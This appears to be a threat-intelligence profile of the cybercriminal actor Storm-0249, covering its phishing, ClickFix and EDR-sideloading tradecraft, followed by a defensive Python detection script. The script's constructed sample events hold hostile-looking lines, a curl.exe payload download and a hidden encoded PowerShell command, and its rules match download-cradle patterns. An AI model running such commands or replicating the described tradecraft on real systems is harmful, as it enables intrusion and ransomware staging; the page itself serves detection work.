Storm-0249
Storm-0249 is a financially motivated cybercriminal threat actor that Microsoft tracks as an initial access broker active since 2021. Microsoft states the actor is known for distributing at least BazaLoader, IcedID, Bumblebee, Emotet, Latrodectus, and Brute Ratel C4 (BRc4), and for brokering network access to ransomware operators. Reporting describes Storm-0249 as having evolved from large-scale, mass-phishing activity into more targeted and stealthier campaigns that prepare victim environments for follow-on ransomware attacks.

Delivery and access methods named directly in the source material include tax-themed phishing, fake DocuSign flows, compromised legitimate websites, malvertising, SEO poisoning, fake ads, and ClickFix social engineering. Microsoft attributed the spring 2025 Latrodectus campaigns, including IRS-themed phishing and fake Windows 11 Pro download sites, to Storm-0249. Microsoft also reported that beginning in March 2025 the actor shifted from traditional email delivery to compromising legitimate websites, potentially via WordPress vulnerabilities, and to using ClickFix to deliver Latrodectus or other initial access malware.

The actor is specifically described as abusing trusted endpoint detection and response (EDR) components and built-in Windows utilities to load malware stealthily, establish persistence, and support ransomware operators. Multiple reports state that Storm-0249 weaponized legitimate EDR processes, including SentinelOne components, for DLL sideloading, and used Windows utilities such as curl.exe and fileless PowerShell execution to blend in with normal activity and evade detection. Source material also states that Storm-0249 used malicious MSI installers running with elevated privileges and relied on the sideloaded DLLs for command-and-control, reconnaissance, and persistence.

Storm-0249 is also linked by Microsoft to Fox Tempest's malware-signing-as-a-service ecosystem. Microsoft states that Storm-0249 was among the threat actors that used Fox Tempest-signed malware in active intrusions, alongside Vanilla Tempest, Storm-0501, and Storm-2561. Fox Tempest-signed malware was reported as being delivered through malvertising, SEO poisoning, and fake ads, and the associated downstream activity included ransomware and malware families such as Oyster, Lumma Stealer, Vidar, Rhysida, Akira, INC, Qilin, and BlackByte.

Alias given in the source material: storm_0249.
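The tradecraft above (a signed EDR executable relocated to a user-writable directory and sideloading an unsigned DLL, curl.exe fetching a payload, and fileless PowerShell) is the kind of behaviour that process-name allowlists miss, because the process name is a trusted vendor binary. The script below is an added example, not code from Microsoft, Mallory or any vendor, showing detection logic for those three behaviours run over a handful of constructed Sysmon-style events. The event fields, the directory patterns, the vendor binary name `vendoragent.exe` and the DLL name `helper.dll` are all assumptions made for the example; no real indicator from the reporting is used.

```python
"""Detection logic for the Storm-0249-style tradecraft described on this page.
Added example with constructed events; field names and paths are assumptions,
not real telemetry or real indicators."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class Event:
    """Minimal Sysmon-like record: process creation (EID 1) or image load (EID 7)."""
    kind: str                  # "process_create" or "image_load"
    image: str                 # full path of the running process
    signed: bool = False       # Authenticode status of `image`
    parent: str = ""           # parent process image (process_create only)
    cmdline: str = ""          # command line (process_create only)
    loaded: str = ""           # DLL path (image_load only)
    loaded_signed: bool = True # Authenticode status of `loaded`


# Directories a standard user can write to; assumed list, extend for your estate.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)|programdata|windows\\temp)\\",
    re.I)
URL = re.compile(r"https?://\S+", re.I)


def in_user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.search(path))


def rule_edr_sideload(ev: Event) -> bool:
    """Signed EXE running from a user-writable directory loads an unsigned DLL
    from that same directory: the classic sideloading layout. Matching on the
    vendor's process name would pass this; matching on path and DLL signature
    does not."""
    if ev.kind != "image_load" or not ev.signed or ev.loaded_signed:
        return False
    img_dir = ev.image.rsplit("\\", 1)[0].lower()
    dll_dir = ev.loaded.rsplit("\\", 1)[0].lower()
    return in_user_writable(ev.image) and img_dir == dll_dir


def rule_curl_download(ev: Event) -> bool:
    """curl.exe invoked with a URL and an output-file flag (payload retrieval)."""
    if ev.kind != "process_create" or not ev.image.lower().endswith("\\curl.exe"):
        return False
    has_output = re.search(r"(^|\s)(-o|-O|--output)(\s|$)", ev.cmdline) is not None
    return bool(URL.search(ev.cmdline)) and has_output


def rule_fileless_powershell(ev: Event) -> bool:
    """PowerShell with an encoded command, or a download cradle piped into IEX."""
    if ev.kind != "process_create":
        return False
    if not re.search(r"\\(powershell|pwsh)\.exe$", ev.image, re.I):
        return False
    c = ev.cmdline
    encoded = re.search(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", c, re.I)
    cradle = (re.search(r"(iex|invoke-expression)", c, re.I)
              and re.search(r"(downloadstring|invoke-restmethod|irm|iwr|invoke-webrequest)", c, re.I))
    return bool(encoded or cradle)


RULES: Dict[str, Callable[[Event], bool]] = {
    "edr_sideload": rule_edr_sideload,
    "curl_download": rule_curl_download,
    "fileless_powershell": rule_fileless_powershell,
}


def triage(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule_name, image) for every event that trips a rule."""
    return [(name, ev.image) for ev in events for name, fn in RULES.items() if fn(ev)]


# Constructed sample events (not real telemetry). The first three model the
# behaviours in the reporting; the fourth is the same vendor binary in its
# proper install location and must not alert.
SAMPLE_EVENTS = [
    Event("image_load", r"C:\Users\jdoe\AppData\Local\Temp\agent\vendoragent.exe", signed=True,
          loaded=r"C:\Users\jdoe\AppData\Local\Temp\agent\helper.dll", loaded_signed=False),
    Event("process_create", r"C:\Windows\System32\curl.exe", signed=True,
          parent=r"C:\Windows\explorer.exe",
          cmdline=r"curl.exe https://example.invalid/p.msi -o C:\Users\jdoe\AppData\Local\Temp\p.msi"),
    Event("process_create", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", signed=True,
          parent=r"C:\Windows\explorer.exe",
          cmdline="powershell.exe -w hidden -enc " + "A" * 40),
    Event("image_load", r"C:\Program Files\Vendor\vendoragent.exe", signed=True,
          loaded=r"C:\Program Files\Vendor\helper.dll", loaded_signed=True),
]

if __name__ == "__main__":
    for rule, image in triage(SAMPLE_EVENTS):
        print(f"{rule:20s} {image}")
```

The sideload rule deliberately keys on where the signed binary runs from and whether the co-located DLL is signed, rather than on the binary's name, so it still fires when the abused component is a different EDR or a renamed copy. In production, replace the constructed events with your Sysmon or EDR image-load and process-creation telemetry and tune `USER_WRITABLE` to the paths your users can actually write to.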
Targeting
Where they target
Geographies tied to known operations.
- 🇺🇸 United States
Tradecraft
17 distinct MITRE ATT&CK techniques observed across reporting, grouped by tactic.
Associated malware families
12 malware families attributed to this actor across reporting.
7 additional families tracked in Mallory.
Observables
16 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
Named by Microsoft as a threat actor that used malware signed through Fox Tempest's fraudulent signing service in real-world intrusions.